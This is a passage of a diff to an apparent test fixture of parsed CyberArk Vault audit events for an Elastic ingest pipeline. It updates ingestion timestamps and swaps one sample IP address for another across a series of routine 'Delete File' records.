"severity": 2, "action": "delete file", - "ingested": "2021-06-09T10:24:35.820704600Z", + "ingested": "2021-12-09T13:37:06.873530700Z", "original": "\u003c5\u003e1 2021-03-08T18:32:43Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:32:43\",\"IsoTimestamp\":\"2021-03-08T18:32:43Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WinDesktopLocal-Address-adriansr\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"adriansr\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "52", "kind": "event" @@ -145,7 +145,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-06-09T10:24:35.820719900Z", + "ingested": "2021-12-09T13:37:06.873540300Z", "original": "\u003c5\u003e1 2021-03-08T18:38:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:38:21\",\"IsoTimestamp\":\"2021-03-08T18:38:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"VaultInternal\",\"File\":\"Root\\\\Operating System-WinServerLocal-components-adriansr\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinServerLocal\"},{\"Name\":\"UserName\",\"Value\":\"adriansr\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"LogonDomain\",\"Value\":\"COMPONENTS\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "52", "kind": "event" @@ -203,7 +203,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-06-09T10:24:35.820722100Z", + "ingested": "2021-12-09T13:37:06.873546400Z", "original": "\u003c5\u003e1 2021-03-08T19:20:04Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 11:20:04\",\"IsoTimestamp\":\"2021-03-08T19:20:04Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManager_workspace\",\"File\":\"Root\\\\Test_4\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"\"}}}", "code": "52", "kind": "event" @@ -216,19 +216,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -248,7 +237,7 @@ }, "related": { "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -258,8 +247,8 @@ "iso_timestamp": "2021-03-11T18:59:57Z", "file": "Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd", "safe": "PSMSessions", - "station": "35.192.121.42", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 10:59:57\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T18:59:57Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e52\u003c/MessageID\u003e\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\n \u003cAction\u003eDelete File\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\u003c/File\u003e\n \u003cStation\u003e35.192.121.42\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eDelete File\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.14", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 10:59:57\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T18:59:57Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e52\u003c/MessageID\u003e\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\n \u003cAction\u003eDelete File\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\u003c/File\u003e\n \u003cStation\u003e67.43.156.14\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eDelete File\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Delete File", "message": "Delete File", "issuer": "PSMApp_ASR-WIN", @@ -273,8 +262,8 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-06-09T10:24:35.820723800Z", - "original": "\u003c5\u003e1 2021-03-11T18:59:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:59:57\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:59:57Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\u003c/File\u003e\\n \u003cStation\u003e35.192.121.42\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:59:57\",\"IsoTimestamp\":\"2021-03-11T18:59:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMSessions\",\"File\":\"Root\\\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:06.873550500Z", + "original": "\u003c5\u003e1 2021-03-11T18:59:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:59:57\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:59:57Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\u003c/File\u003e\\n \u003cStation\u003e67.43.156.14\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:59:57\",\"IsoTimestamp\":\"2021-03-11T18:59:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMSessions\",\"File\":\"Root\\\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"\"}}}", "code": "52", "kind": "event" } @@ -341,7 +330,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-06-09T10:24:35.820725300Z", + "ingested": "2021-12-09T13:37:06.873555300Z", "original": "\u003c5\u003e1 2021-03-11T19:32:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 11:32:12\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T19:32:12Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"_PSMLiveSessions_1\\\" Value=\\\"\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"_PSMLiveSessions_2\\\" Value=\\\"\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"_PSMLiveSessions_3\\\" Value=\\\"\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"_PSMLiveSessions_4\\\" Value=\\\"\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"_PSMLiveSessions_5\\\" Value=\\\"\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 11:32:12\",\"IsoTimestamp\":\"2021-03-11T19:32:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_VAGRANT.LiveSessions\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"_PSMLiveSessions_1\",\"Value\":\"\"},{\"Name\":\"_PSMLiveSessions_2\",\"Value\":\"\"},{\"Name\":\"_PSMLiveSessions_3\",\"Value\":\"\"},{\"Name\":\"_PSMLiveSessions_4\",\"Value\":\"\"},{\"Name\":\"_PSMLiveSessions_5\",\"Value\":\"\"}]}}}}", "code": "52", "kind": "event" @@ -375,7 +364,7 @@ }, "@timestamp": "2021-03-11T21:06:40.000Z", "file": { - "path": "Root\\Operating System-WinDomain-35.192.121.42-PSMConnect" + "path": "Root\\Operating System-WinDomain-67.43.156.14-PSMConnect" }, "ecs": { "version": "1.12.0" @@ -391,19 +380,19 @@ "severity": "Info", "iso_timestamp": "2021-03-11T21:06:40Z", "gateway_station": "10.0.1.20", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 13:06:40\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T21:06:40Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e52\u003c/MessageID\u003e\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eDelete File\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-35.192.121.42-PSMConnect\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eDelete File\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"PSMConnect\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"35.192.121.42\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 13:06:40\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T21:06:40Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e52\u003c/MessageID\u003e\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eDelete File\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.14-PSMConnect\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eDelete File\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"PSMConnect\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.14\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Delete File", "issuer": "Administrator", "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "35.192.121.42", + "address": "67.43.156.14", "creation_method": "PVWA", "policy_id": "WinDomain", "user_name": "PSMConnect" }, - "file": "Root\\Operating System-WinDomain-35.192.121.42-PSMConnect", + "file": "Root\\Operating System-WinDomain-67.43.156.14-PSMConnect", "safe": "PSM", "station": "127.0.0.1", "action": "Delete File", @@ -417,8 +406,8 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-06-09T10:24:35.820726700Z", - "original": "\u003c5\u003e1 2021-03-11T21:06:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:06:40\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:06:40Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-35.192.121.42-PSMConnect\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"35.192.121.42\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:06:40\",\"IsoTimestamp\":\"2021-03-11T21:06:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-WinDomain-35.192.121.42-PSMConnect\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"PSMConnect\"},{\"Name\":\"Address\",\"Value\":\"35.192.121.42\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:06.873560700Z", + "original": "\u003c5\u003e1 2021-03-11T21:06:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:06:40\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:06:40Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-PSMConnect\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.14\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:06:40\",\"IsoTimestamp\":\"2021-03-11T21:06:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating 